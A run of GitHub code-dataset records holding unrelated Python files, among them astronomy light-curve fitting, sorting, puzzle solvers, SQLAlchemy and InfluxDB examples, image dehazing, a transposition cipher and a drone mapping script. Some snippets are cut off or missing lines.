c=\"blue\", s=10, marker=\"o\")\n ax1 = fig.add_subplot(212)\n plt.ylim([-0.001, 0.001])\n ax1.scatter(stack_time, stack_flux - model_flux, c=\"red\", s=10, marker=\"o\")\n plt.show()\n\ndef test2():\n param = {\n \"ecc\": 0.23,\n \"inc\": 0.84,\n \"omega\": 0.1,\n \"t0\": 2.565,\n \"S\": 0.0028,\n \"C\": 1.0002,\n \"p\": 0.00052,\n \"q\": 3.79,\n \"rp\": 0.1,\n \"a\": 15.,\n \"q1\": 0.11,\n \"q2\": 0.31,\n \"fp\": 0.001\n }\n data = ImportData(\"003766353\", 2.666965)\n stack_time, stack_flux, stack_err = data.exportStackData(1000)\n #masked_flux = maskEclipse(stack_time, stack_flux)\n hbm = HeartBeatModel(**param)\n tp, ts = hbm.getEclipseTime()\n #print(tp, ts)\n em = EclipseModel(**param)\n em.get_params(tp, ts)\n ta1 = hbm.t2ta(stack_time)\n m#odel_flux = hbm.modelFunc(stack_time)\n ta2 = em.getTrueAnomaly(stack_time)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.scatter(ta1, stack_flux, c=\"blue\", s=10, marker=\"o\")\n ax.scatter(ta2, stack_flux, c=\"red\", s=10, marker=\"o\")\n plt.show()\n\nif __name__ == \"__main__\":\n #main2()\n test()\n","repo_name":"tajiritomoyuki/Fitting","sub_path":"FitHeartBeatEclipse.py","file_name":"FitHeartBeatEclipse.py","file_ext":"py","file_size_in_byte":17261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11072132342","text":"def find_all(a_string, sub):\n result = []\n k = 0\n while k < len(a_string):\n k = a_string.find(sub, k)\n if k == -1:\n return result\n else:\n result.append(k)\n k += 1 #change to k += len(sub) to not search overlapping results\n return result\n \n","repo_name":"mars1198/bioinformatics","sub_path":"find_indexes_of_all_substings.py","file_name":"find_indexes_of_all_substings.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6770507705","text":"def quickSort(alist):\r\n quickSortHelper(alist,0,len(alist)-1)\r\n\r\ndef quickSortHelper(alist,first,last):\r\n if first= pivotvalue and rightmark >= leftmark:\r\n rightmark = rightmark -1\r\n\r\n if rightmark < leftmark:\r\n done = True\r\n else:\r\n temp = alist[leftmark]\r\n alist[leftmark] = alist[rightmark]\r\n alist[rightmark] = temp\r\n\r\n temp = alist[first]\r\n alist[first] = alist[rightmark]\r\n alist[rightmark] = temp\r\n\r\n\r\n return rightmark\r\n\r\nalist = ['intermodalismo', 'azoinar', 'tostão', 'nitro', 'inflorescência', 'comprazimento', 'tentativa', 'amoestar', 'poesia', 'conta', 'supletivo', 'avante', 'vestidura', 'arbitragem', 'fouce', 'hizo',\r\n 'borgonhês', 'presumptivo', 'reabastecedor', 'equilibrar', 'dolosamente', 'liberador', 'reviramento', 'alambique', 'acredital', 'obstrução', 'embarcação', 'decodificador', 'aglutininas', 'pessoas', 'pineal',\r\n 'glicosúria', 'remailer', 'bairrista', 'monstrozinho', 'desnaturado', 'disselhe', 'tri-campeã', 'disserão', 'loudel', 'iletrado', 'motociclístico', 'orçar', 'degenerativo', 'observancia', 'geoestacionário',\r\n 'preferencia', 'cambialmente', 'unido', 'inositadamente', 'caos', 'constringir', 'jambu', 'núcelo', 'telejogo', 'corpora', 'telégrafo', 'endoscópio', 'vestibular', 'ilusório', 'vinil', 'micropartido', \r\n 'hip-hop','grandiloquência', 'desmineralização', 'ex-executivo', 'tolamente', 'supposto', 'autocrático', 'faltar', 'crocitar', 'autotanque', 'momentaneamente', 'argentar', 'eurocepticismo', 'morrão', \r\n 'perfuração','peleguismo', 'inflacionário', 'ilustradora', 'extra-muro', 'institucionalidade', 'demissionismo', 'repentista', 'sulfureto', 'detento', 'enfolhado', 'ro-ro', 'vacum', 'detalhista', \r\n 'maritimista', 'cel','não-realizar', 'windsurfista', 'tesourada', 'exemplificativamente', 'exógeno', 'atte', 'estremadamente', 'escurecer','peneira', 'ex-arcebispo', 'wizard', 'sanctorum', 'alevita',\r\n 'médico-paciente', 'intrometter','escovar', 'beco', 'digitalmente', 'rectroescavadora', 'am', 'isótopo', 'tamanca', 'apertado', 'óio', 'tresdobrar', 'domesticar', 'diminuir', 'vilão', 'farricoco',\r\n 'avantesma', 'afásico', 'anti-semita','entrae', 'garfo', 'pregado', 'louquinho', 'ensolarado', 'ferocidade', 'top-model', 'vacatio', 'céptico', 'repovoamento', 'auto-dissolver', 'bugiganga', 'percorrer',\r\n 'should', 'prendeo', 'universitaria', 'colorido','transfuga', 'rótulo', 'argumentativamente', 'ciganada','esfalfamento', 'promettar', 'escampar', 'inverídico', 'enlace', 'apr', 'qual', 'além-mar', \r\n 'bestinha', 'aliciador', 'limoeiro', 'conversão','quiosque', 'malferido', 'grenho', 'bulhão', 'lastrear', 'touchdown', 'sintrense', 'corniaberto', 'hhh', 'acometimento', 'grã-fino', 'espumante',\r\n 'louuor', 'sur', 'franchisado', 'fraco', 'nebrino','sacho', 'chaque', 'torc', 'brotar', 'público','cedilha', 'subholding', 'terceiro-oficial', 'mourisco', 'dramatículo', 'vale', 'maviosamente', \r\n 'monotonamente', 'moquear', 'queimar', 'enunciado','desmultiplicar', 'desfalecidamente', 'internacionalista', 'certezinha', 'não-associar', 'monotorização', 'ajoelhado', 'mingar', 'tetraneto', 'propria']\r\nquickSort(alist)\r\nprint(alist)","repo_name":"MirkosMartins/ComplexidadeAlgoritmos","sub_path":"Douglas Iracet/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14073438066","text":"# Advent of Code 2022 Day 18\n# Soln from: https://github.com/silentw0lf/advent_of_code_2022/blob/main/18/solve.py\n\nimport re\n\n#input file is x,y,z coords of 1*1*1 cubes\nwith open(\"Day18TestInput.txt\") as f:\n cubes = [tuple(map(int, re.findall(\"(\\d+)\", l))) for l in f.readlines()]\n\n# find smallest and largest values with a buffer of 1 each side\nminout = [min(c[i]-1 for c in cubes) for i in range(3)]\nmaxout = [max(c[i]+1 for c in cubes) for i in range(3)]\n\n\ndef in_space(cube):\n # check whether this cube is in our space\n # all() returns true if all the items in the list meet the condition\n return all(minout[i] <= cube[i] <= maxout[i] for i in range(3))\n\n\ndef get_neighbors(cube):\n# work out what the cubes surrounding this one would be:\n return [tuple(sum(x) for x in zip(cube, d)) for d in \\\n [(1, 0, 0), (-1, 0, 0), (0, 1, 0), (0, -1, 0), (0, 0, 1), (0, 0, -1)]]\n\n\n# part 1\nexposed = 0\nfor cube in cubes:\n for n in get_neighbors(cube):\n if n not in cubes: #if the cube that would cover this face is inst in our set then this face is exposed\n exposed += 1\n\n# part 2\nexposed_outside = 0\nseen = set()\nqueue = [tuple(maxout)]\nwhile queue:\n curr_cube = queue.pop(0)\n if curr_cube in cubes:\n exposed_outside += 1\n continue\n if curr_cube not in seen:\n seen.add(curr_cube)\n for n in get_neighbors(curr_cube):\n if in_space(n):\n queue.append(n)\n\nprint(exposed)\nprint(exposed_outside)","repo_name":"sholden69/AdventOfCode2022","sub_path":"day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8205063192","text":"# -*- coding: utf-8 -*-\n\"\"\"Example of StaticPool.\"\"\"\nfrom contextlib import contextmanager\nimport datetime\nimport logging\nimport os\nimport sys\nimport time\nimport typing\n\nfrom sqlalchemy import Column, Integer, String, DateTime\nfrom sqlalchemy.orm import declarative_base\nimport sqlalchemy\nimport sqlalchemy.orm\n\n\nlogger: logging.Logger = logging.getLogger(__name__)\nstream_handler: logging.StreamHandler = logging.StreamHandler()\nstream_handler.setLevel(logging.DEBUG)\nlogger.setLevel(logging.DEBUG)\nlogger.addHandler(stream_handler)\nlogger.propagate = False\nstream_handler.setFormatter(\n logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s')\n)\n\nBase = declarative_base()\n\n\nclass FruitsMenu(Base):\n \"\"\"Fruits Menu.\"\"\"\n __tablename__ = 'fruits_menu'\n\n id = Column(Integer, primary_key=True) # emits SERIAL\n name = Column(String(16), unique=True)\n price = Column(Integer)\n # Default value is the creation time, not automatically updated\n mod_time = Column(DateTime, server_default=sqlalchemy.sql.func.now())\n __table_args__ = (\n sqlalchemy.PrimaryKeyConstraint('id'),\n {'schema': 'guest'}\n )\n\n def __init__(self, name, price):\n self.name = name\n self.price = price\n\n def __str__(self):\n return '{' + \"id: {}, name: '{}', price: {}, mod_time: '{}'\".format(\n self.id, self.name, self.price, self.mod_time.isoformat()\n ) + '}'\n\n def to_dict(self):\n \"\"\"Generate non-primitive dict.\"\"\"\n return {\n 'name': self.name,\n 'price': self.price,\n 'mod_time': self.mod_time.isoformat()\n }\n\n\ndef optional_int(\n num_str: typing.Optional[str]\n) -> typing.Optional[int]:\n \"\"\"Optional[str] to Optional[int].\"\"\"\n if num_str is None:\n return None\n return int(num_str)\n\n\n@contextmanager\ndef create_engine(\n driver_name: str\n) -> typing.Generator[sqlalchemy.engine.base.Engine, None, None]:\n \"\"\"Create engine.\"\"\"\n engine = sqlalchemy.create_engine(\n sqlalchemy.engine.URL.create(\n driver_name,\n host=os.environ.get('PGHOST'),\n port=optional_int(os.environ.get('PGPORT')),\n database=os.environ.get('PGDATABASE'),\n username=os.environ.get('PGUSER'),\n password=os.environ.get('PGPASSWORD')\n ),\n poolclass=sqlalchemy.pool.StaticPool\n )\n yield engine\n time.sleep(10)\n print(f'{datetime.datetime.now()}: engine.dispose(): BEGIN')\n engine.dispose()\n print(f'{datetime.datetime.now()}: engine.dispose(): END')\n time.sleep(10)\n print(f'{datetime.datetime.now()}: process.exit()')\n\n\ndef main(driver_name: str):\n \"\"\"Run main.\"\"\"\n with create_engine(driver_name) as engine:\n t_0 = time.time()\n print(f'{datetime.datetime.now()}: sqlalchemy.orm.sessionmaker()()')\n session = sqlalchemy.orm.sessionmaker(\n autocommit=False, autoflush=False, bind=engine\n )()\n print(f'{datetime.datetime.now()}: session.query(): BEGIN')\n count = session.query(\n FruitsMenu\n ).count()\n t_1 = time.time()\n print(f'{datetime.datetime.now()}: session.query(): END')\n time.sleep(10)\n print(f'dt = {(t_1 - t_0):.3f}s; count={count}')\n\n\nif __name__ == '__main__':\n if sys.argv[1] in ['postgresql+pg8000', 'postgresql+psycopg2']:\n main(sys.argv[1])\n else:\n print(\n f\"usage: {sys.argv[0]} \"\n '{postgresql+pg8000|postgresql+psycopg2}',\n file=sys.stderr\n )\n\n# EOF\n","repo_name":"unmyr/python-examples","sub_path":"database/sqlalchemy-postgresql/src/sqlalchemy_pool_StaticPool.py","file_name":"sqlalchemy_pool_StaticPool.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29234111289","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom skimage import io, color, exposure \nimport skimage.filters.rank as sfr\nfrom skimage.morphology import square #rectangular filter-kernel\n#from skimage.morphology import disk \t#circular filter-kernel\n\nimport cv2\n\nimport guide_filter as gf\n\n\n\n\n'''\n\tstep 1:\n\tgetting dark_channel by using min Filter to min_channel\n\tMin_channel defines as minimum of {r,g,b} in all pixel\n'''\ndef __calculate_dark_channel(image, rads):\n\t(row, col, channel) = image.shape\n\tMin_channel = np.zeros((row,col),'uint8')\n\tMin_channel = image.min(axis=2) \n\tdark_channel = sfr.minimum(Min_channel,square(rads))\n\n\treturn dark_channel\n\n'''\n\t- image : original image\n\t- dark : dark_channel image\n\t- limit : limit of A \n'''\ndef __calculate_atmospheric_light(image, dark, limit = 200):\n\thist = np.histogram(dark, bins=100)\n\tposition = np.where(dark>=hist[1][-2])\n\tA = np.zeros(3,dtype = 'double')\n\tfor i in range(image.shape[2]):\n\t\tA[i] = np.mean(image[position[0],position[1],i]) \n\t\tif A[i] >= limit:\n\t\t\tA[i] = limit\n\n\treturn A\n\n'''\n\tcalculating transmition t(x) with guide filter\n\t- image : orignal image\n\t- A : atmospheric light\n\t- rads : filter radius (default 15)\n\t- w : modification coefficient\n'''\ndef __calculate_transmition_image(image, A, rads, eps = 0.001, w = 0.95):\n\n\tIy = np.zeros(image.shape,'double')\n\tfor i in range(image.shape[2]):\n\t\tIy[:,:,i] = image[:,:,i]/A[i]\n\tImin_c = Iy.min(axis=2)\n\tpos = np.where(Imin_c > 1)\n\tImin_c[pos[0],pos[1]] = 1 / Imin_c[pos[0],pos[1]]\n\tImin_filter = sfr.minimum(Imin_c,square(rads))\n\trough_transmition = 1 - w * (Imin_filter/255.0)\n\torigin_gray = color.rgb2gray(image)\n\ttransmition_image = gf.guidefilter(origin_gray,rough_transmition,rads*4,eps)\n#\tio.imsave('../transmition.jpg',transmition_image)\n\n\treturn transmition_image\n\n\ndef __recover_no_foggy_image(image, transmition, A, gamma = 0.588):\n\tT = np.zeros((transmition.shape[0],transmition.shape[1],2))\n\tT[:,:,0] = np.full(transmition.shape,0.1)\n\tT[:,:,1] = transmition\n\tT_max = T.max(axis=2)\n\n\tJ_img = np.zeros(image.shape)\n\tA_scale = A/250.0\n\timg_scale = image/255.0\n\tfor i in range(image.shape[2]):\n\t\tJ_img[:,:,i] =A_scale[i] - (A_scale[i] - img_scale[:,:,i])/T_max\n\t\tp1 = np.where(J_img[:,:,i]>1)\n\t\tJ_img[p1[0],p1[1],i] = 1\n\t\tp2 = np.where(J_img[:,:,i]<0)\n\t\tJ_img[p2[0],p2[1],i] = 0\t\t\n\n\tJ_img_gamma = np.power(J_img/float(np.max(J_img)), gamma)\n\n\treturn J_img_gamma\n\ndef haze_removal(original_img, rads = 5):\n\toriginal = cv2.imread(original_img)\n\tdark_channel = __calculate_dark_channel(original, rads)\n\tA = __calculate_atmospheric_light(original, dark_channel)\n\ttransmition = __calculate_transmition_image(original,A,rads)\n\tJ_img = __recover_no_foggy_image(original,transmition,A)\n\n\treturn J_img\n\n'''\nif __name__ == '__main__':\n\n\tno_foggy_img = haze_removal('/home/xiaoqing/Project_git/night_image_enhance/input.jpg')\n\n\tplt.subplot(2,1,1)\n\tio.imshow(original_img)\n\tplt.subplot(2,1,2)\n\tio.imshow(no_foggy_img)\n\tio.show()\n'''\n\n\n","repo_name":"qingxiao1101/BG_Subtraction","sub_path":"haze_removal/haze_removal.py","file_name":"haze_removal.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26750383080","text":"#!/usr/bin/env python3\n\nimport psycopg2\nimport json\nfrom os.path import join\nimport os\nimport itertools\n\ndef config_reader(read_path):\n with open(read_path, 'r') as input_file:\n conf_file = json.load(input_file)\n\n return conf_file\n\n\ndef get_backends(cursor):\n cursor.execute(\"select distinct exec from perftest_2;\")\n backends = list(itertools.chain(*cursor.fetchall()))\n return backends\n\n\ndef get_algos(cursor):\n cursor.execute(\"select distinct algo_comp from perftest_2;\")\n algos = list(itertools.chain(*cursor.fetchall()))\n return algos\n\n\ndef get_release_time(cursor, backend, algo):\n print('######')\n print(backend)\n print(algo)\n print('#####')\n exec_string = \"select time, tag from perftest_2 where algo_comp = '{}' and exec='{}';\".format(algo, backend)\n print(exec_string)\n cursor.execute(exec_string)\n rows = cursor.fetchall()\n x = map(lambda x: x[1], rows)\n y = map(lambda x: float(x[0]), rows)\n return list(x), list(y)\n\ndef init_connection():\n DIR = os.getcwd()\n FILE = join('creds', 'login.json')\n PATH = join(DIR, FILE)\n login_info = config_reader(PATH)\n conn_string = \"host={} port={} dbname={} user={} password={}\".format(\n login_info['host'], login_info['port'], login_info['dbname'], login_info['user'], login_info['password'])\n conn = psycopg2.connect(conn_string)\n cursor = conn.cursor()\n return cursor\n\nif __name__ == '__main__':\n conn = init_connection()\n #backend = get_backends(conn)\n #algos = get_algos(conn)\n x, y = get_release_time(conn, 'singlenode', 'multinomial_data-gen_none_dense_10k_100')\n print(x)\n print(y)\n","repo_name":"krishnakalyan3/bokeh_example","sub_path":"systemml/conn_test.py","file_name":"conn_test.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71074579948","text":"\"\"\"\nAdmin stats handler\n\"\"\"\nimport requests\nfrom influxdb.client import InfluxDBClient\nfrom configs import config\nfrom app.handlers.base_handler import BaseHandlerWithAuth\nfrom app.handlers.statistic_helpers import prepare_params\nfrom crutches_on_wheels.errors.errors import Error\nfrom crutches_on_wheels.errors.exception import VLException\nfrom tzlocal import get_localzone\n\n_, IP, PORT = config.ADMIN_STATISTICS_SERVER_ORIGIN.split(':')\nIP = IP[2:]\ninfluxClient = InfluxDBClient(IP, database=config.ADMIN_STATISTICS_DB, port=int(PORT), timeout=60)\n\n\nclass RealtimeStatisticsHandler(BaseHandlerWithAuth):\n \"\"\"\n Admin stats handler.\n \"\"\"\n\n @BaseHandlerWithAuth.requestExceptionWrap\n def get(self, series: str) -> None:\n \"\"\"\n Search element by id or email.\n\n .. http:get:: /realtime_statistics/{series}\n\n\n :param series: extract_success|matching_success|errors\n :query resource: resource to get statistics about. Will be ignored if not set.\n (\"descriptors\", \"search\", \"match\", \"identify\", \"verify\")\n :query error: luna API error code to get statistics about\n :query aggregator: aggregation type (\"max\", \"min\", \"mean\", \"count\")\n :query count_faces: result count faces on photo\n :query limit: matching limit in match request\n :query template: template in match request. 1 - person, 0 - descriptor\n :query candidate: candidate in match request. 1 - dynamic list, 0 - static Luna API list\n\n :reqheader Authorization: basic authorization\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 Ok\n Vary: Accept\n Content-Type: application/json\n LUNA-Request-Id: 1516179740,d3abc2f6-70f1-4ae0-9d10-475103e0891d\n\n .. json:object:: stats result\n :showexample:\n\n :property name: The name of current series\n :proptype name: _enum_(extract_success)_(matching_success,errors)\n :property columns: Titles of cells in values' batches\n :property values: List of values' batches\n\n Message error is returned in format :json:object:`server_error`.\n\n :statuscode 200: success\n :statuscode 400: Bad query parameters\n :statuscode 500: internal server error\n \"\"\"\n\n paramsRes = prepare_params(self.get_query_argument, series)\n if paramsRes.fail:\n error = Error.generateError(paramsRes.error,\n paramsRes.value)\n raise VLException(error, 400, isCriticalError=False)\n params = paramsRes.value\n\n query = \"SELECT {aggregator}(*) FROM {series} WHERE {time__gte} < time AND time < {time__lt} {where} group by time({group_by}) fill(none)\".format(\n **params)\n try:\n res = influxClient.query(query + \" TZ('{}')\".format(get_localzone()))\n except requests.exceptions.ConnectionError:\n raise VLException(Error.InfluxConnectionTimeout, 500, False)\n\n return self.success(200, outputJson=res.raw['series'][0] if 'series' in res.raw else {})\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-admin/luna_admin/app/handlers/realtime_statistics.py","file_name":"realtime_statistics.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16668257707","text":"import random\n\n\ndef encode(input_bytes: bytearray, columns: str) -> bytearray:\n columns_count = len(columns)\n result = bytearray()\n while len(input_bytes) % columns_count != 0:\n input_bytes.extend(b'z')\n bytes_count = len(input_bytes)\n for column_iterator in range(1, columns_count + 1):\n index_of_next_column = columns.index(str(column_iterator)) + 1\n for bytes_iterator in range(index_of_next_column, bytes_count + 1, columns_count):\n resulting_byte = input_bytes[bytes_iterator - 1]\n result.append(resulting_byte)\n return result\n\n\n\"\"\"\n5147263\nabcdefg\nhijklmn\nopqrstu\nwxyzzzz\n\nbipx-elsz-gnuz-cjqy-ahow-fmtz-dkrz\nbipx-elsz-gnuz-cjqy-ahow-fmtz-dkrz')\n\n\"\"\"\n\n\ndef decode(input_bytes: bytearray, columns: str) -> bytes:\n columns_count = len(columns)\n rows_count = len(input_bytes) // columns_count\n rows_usage = [0 for _ in range(columns_count)]\n result = bytearray()\n for i in range(len(input_bytes)):\n current_column = int(columns[i % columns_count])\n bytes_before = (current_column - 1) * rows_count\n desired_byte = bytes_before + rows_usage[current_column - 1]\n result.append(input_bytes[desired_byte])\n rows_usage[current_column - 1] += 1\n return result\n\n\ndef make_padding(input_bytes: bytearray, columns: str):\n columns_count = len(columns)\n while len(input_bytes) % columns_count != 0:\n input_bytes.extend(b'z')\n\n\ndef validate_input(columns: str) -> bool:\n if not columns.isnumeric():\n return False\n return True\n\n\ndef main(input_filename: str,\n output_filename: str,\n columns: str,\n mode: str = \"encode\"):\n with open(input_filename, \"rb\") as file:\n input_bytes = bytearray(file.read())\n if mode == \"encode\":\n make_padding(input_bytes, columns)\n output_bytes = encode(input_bytes, columns)\n elif mode == \"decode\":\n output_bytes = decode(input_bytes, columns)\n else:\n output_bytes = b''\n with open(output_filename, \"wb\") as file:\n file.write(output_bytes)\n\n\ndef assertion(string: str, columns: str):\n input_bytes = bytearray(string, \"utf-8\")\n make_padding(input_bytes, columns)\n encoded_bytes = encode(input_bytes, columns)\n decoded_bytes = decode(encoded_bytes, columns)\n actual = decoded_bytes.decode(\"utf-8\")\n assert actual[:len(string)] == string, f\"actual and expected differ: expected {string}, but decoded {actual}\"\n\n\ndef debug(tests_count: int = 1000):\n string = \"1234567890-=!@#$%^&*()_+qwertyuiop[]asdfghjkl;'zxcvbnm,./QWERTYUIOP{}ASDFGHJKL:\\\"ZXCVBNM<>?~`\\\\\"\n for i in range(tests_count):\n columns_count = random.randint(1, 9)\n string_length = random.randint(1, 100)\n string = \"\".join([random.choice(string) for _ in range(string_length)])\n columns_array = []\n for j in range(1, columns_count + 1):\n columns_array.append(str(j))\n random.shuffle(columns_array)\n columns = \"\".join(columns_array)\n assertion(string, columns)\n\n\nif __name__ == \"__main__\":\n main(\"encoded.txt\", \"decode.txt\", '5147263', \"decode\")\n # try:\n # debug()\n # except AssertionError as e:\n # print(e)\n","repo_name":"stryukovsky/InfoProtection1","sub_path":"third_task.py","file_name":"third_task.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74958741547","text":"import requests\nimport csv\nimport json\nimport os\n\nfilename = './水利資料整合雲平台.csv'\n\ntry:\n with open(filename, 'r', encoding='utf-8-sig') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n print(row)\n api_url = row['API網址']\n frequency = row['更新頻率']\n if frequency == '不定期:上傳機關依據現場狀況進行上傳週期調整':\n frequency = '不定期'\n title = row['資料標題']\n response = requests.get(api_url)\n data = response.json()\n filename = f'C:/Users/PC/Desktop/AI大數據人才養成/集先鋒/test/data/({frequency}){title}.json'\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'w', encoding='utf-8') as jsonfile:\n json.dump(data, jsonfile, ensure_ascii=False, indent=4)\n print(f'已寫入{filename}')\nexcept Exception as e:\n print(f\"Error reading CSV file: {e}\")","repo_name":"super0selina/API_Water-Resources-Agency","sub_path":"data_水利資料整合平台/insert_data.py","file_name":"insert_data.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24850931048","text":"'''\nWRITING T0 A FILE\n-------------------\nWhen you write to a file, the output will still be avilable after you close the terminal\ncontaining your program's output. \n\nWriting to an Empty File:\n-------------------------\nTo write text to a file, you need to call open() with a second argument telling\nPython that you want to write to the file. \n'''\n\nfilename = 'programming.txt'\n\n'''\nwith open(filename, 'w') as file_object:\n file_object.write(\"This is all mundane.\")\n'''\n\n'''\nThe call to open() in this example has two arguments. The first argument is still the name\nof the file we want to open. The 2nd arg, 'w' tells Python that we want to open the file\nin 'write mode'. \n\nYou can open a file in 'read mode' ('r'), write mode ('w'), append mode ('a'), or a mode\nthat allows you to read and write to the file ('r+'). \nIf you omit the mode arg, Python opens the file in read-only mode by default. \n\nThe open() function automatically creates the file you're writing to if it doesn't already exist. \nHowever, be careful opening a file in write mode ('w') b/c if the file does exist, Python\nwill erase the contents of the file before returning the file object. \n\n\nWRITING MULTIPLE LINES:\n------------------------\nThe write() function doesn't add any newlines to the text we write. So if you write\nmore than one line without including newline characters, your file may not look the way you \nwant it to:\n\n\nAPPENDING TO A FILE:\n-------------------\nIf you want to add content to a file instead of writing over exisiting content, \nyou can open the file in append mode. When you open a file in append mode, \nPython doesn't erase the contents of the file before returning the file object. \n'''\n\nwith open(filename, 'a') as file_object:\n file_object.write(\"The sun explodes into tiny fragements that \\n\")\n file_object.write(\"will nourish the surronding stars within the galaxy.\\n\")","repo_name":"CodeSoju/PythonCrashCourse","sub_path":"Chapter10/writing_to_file.py","file_name":"writing_to_file.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21952681943","text":"from app.database import db\nfrom .models import Todo\n\n\nclass SqlaRepo:\n def __init__(self):\n pass\n\n @staticmethod\n def _create_todo_objects(results):\n return [\n Todo(\n id=q.id,\n title=q.title,\n is_done=q.is_done,\n created_at=q.created_at\n )\n for q in results\n ]\n\n def list(self, filters=None):\n session = db.session\n query = session.query(Todo)\n\n return self._create_todo_objects(query.all())\n","repo_name":"yoophi/api-template-base","sub_path":"app/repository/sqla/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36326411956","text":"def intersect(X1, X2, Y1, Y2, Z1, Z2, x1, x2, y1, y2, z1, z2):\n if x1 <= X2 and x2 >= X1:\n if y1 <= Y2 and y2 >= Y1:\n if z1 <= Z2 and z2 >= Z1:\n return True\n \n return False\n \n \ndef volume(x1, x2, y1, y2, z1, z2):\n return (x2 - x1 + 1) * (y2 - y1 + 1) * (z2 - z1 + 1)\n\n\ncount = 0\ncuboids = []\nwith open('input.txt') as f:\n for line in f.readlines():\n line = line.strip()\n state, coords = line.split()\n X, Y, Z = coords.split(',')\n X1, X2 = map(int, X.split('=')[-1].split('..'))\n Y1, Y2 = map(int, Y.split('=')[-1].split('..'))\n Z1, Z2 = map(int, Z.split('=')[-1].split('..'))\n \n for cub in reversed(cuboids):\n if intersect(X1, X2, Y1, Y2, Z1, Z2, *cub):\n x1, x2, y1, y2, z1, z2 = cub\n \n xs = [x for x in [x1, X1 - 1, X1, X2, X2 + 1, x2] if x1 <= x <= x2]\n ys = [y for y in [y1, Y1 - 1, Y1, Y2, Y2 + 1, y2] if y1 <= y <= y2]\n zs = [z for z in [z1, Z1 - 1, Z1, Z2, Z2 + 1, z2] if z1 <= z <= z2]\n if len(xs) == 3:\n xs = [xs[0], xs[1], xs[1] + 1, xs[2]]\n if len(ys) == 3:\n ys = [ys[0], ys[1], ys[1] + 1, ys[2]]\n if len(zs) == 3:\n zs = [zs[0], zs[1], zs[1] + 1, zs[2]]\n \n for i in range(0, len(xs) - 1, 2):\n for j in range(0, len(ys) - 1, 2):\n for k in range(0, len(zs) - 1, 2):\n c = (xs[i], xs[i + 1], ys[j], ys[j + 1], zs[k], zs[k + 1])\n vol = volume(*c)\n if vol > 0 and not intersect(X1, X2, Y1, Y2, Z1, Z2, *c):\n cuboids.append(c)\n count += vol\n\n count -= volume(*cub)\n cuboids.remove(cub)\n\n if state == 'on':\n cuboids.append((X1, X2, Y1, Y2, Z1, Z2))\n count += volume(X1, X2, Y1, Y2, Z1, Z2)\n\nfor a in cuboids:\n for b in cuboids:\n if a != b and intersect(*a, *b):\n print('error')\n \nprint(count)\n","repo_name":"Panurb/aoc2021","sub_path":"22/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14241215898","text":"from copy import copy\nfrom sys import path\n\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport matplotlib.image as image\nimport numpy as np\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\npath.extend([path[0][:path[0].rindex(\"src\") - 1]])\nfrom bin.Coordinators.gym_coordinator import Coordinator\nfrom bin.Environment.simple_env import Env\n\n_z = np.flipud(image.imread(\"C:/Docs/ETSI/BO_drones/data/Map/Ypacarai/map.png\"))[:, :, 0]\nnans = np.fliplr(np.asarray(np.where(_z == 1)).reshape(2, -1).T)\n\n\ndef get_clean(_file):\n # return _file\n for nnan in nans:\n _file[nnan[1], nnan[0]] = -1\n return np.ma.array(_file, mask=(_file == -1))\n\n\n_bo_xs = np.array([[563, 375],\n # [559, 410],\n [604, 368],\n [647, 327],\n # [704, 362],\n # [690, 430],\n [671, 504],\n # [676, 581],\n # [649, 650],\n # [611, 716],\n # [593, 793],\n # [584, 873],\n # [498, 888],\n # [416, 915],\n # [331, 936],\n # [245, 953],\n # [214, 1023],\n # [259, 958],\n # [276, 1033],\n # [293, 1108],\n # [331, 1039],\n # [334, 1046]\n ])\n\nsensors = {\"s5\", \"s6\"}\nenvironment = Env(map_path2yaml=path[-1] + \"/data/Map/Ypacarai/map.yaml\")\nenvironment.add_new_map(sensors, file=0, clone4noiseless=False)\ncoordinator = Coordinator(environment.grid, sensors)\n\npos = _bo_xs[0, :]\ni_pos = pos\n_bo_xs = _bo_xs[1:, :]\nread = [{\"pos\": pos, \"s5\": environment.maps[\"s5\"][pos[1], pos[0]], \"s6\": environment.maps[\"s6\"][pos[1], pos[0]]}]\n\nxticks = np.arange(0, 1000, 200)\nyticks = np.arange(0, 1500, 200)\nxnticks = [str(format(num * 10, 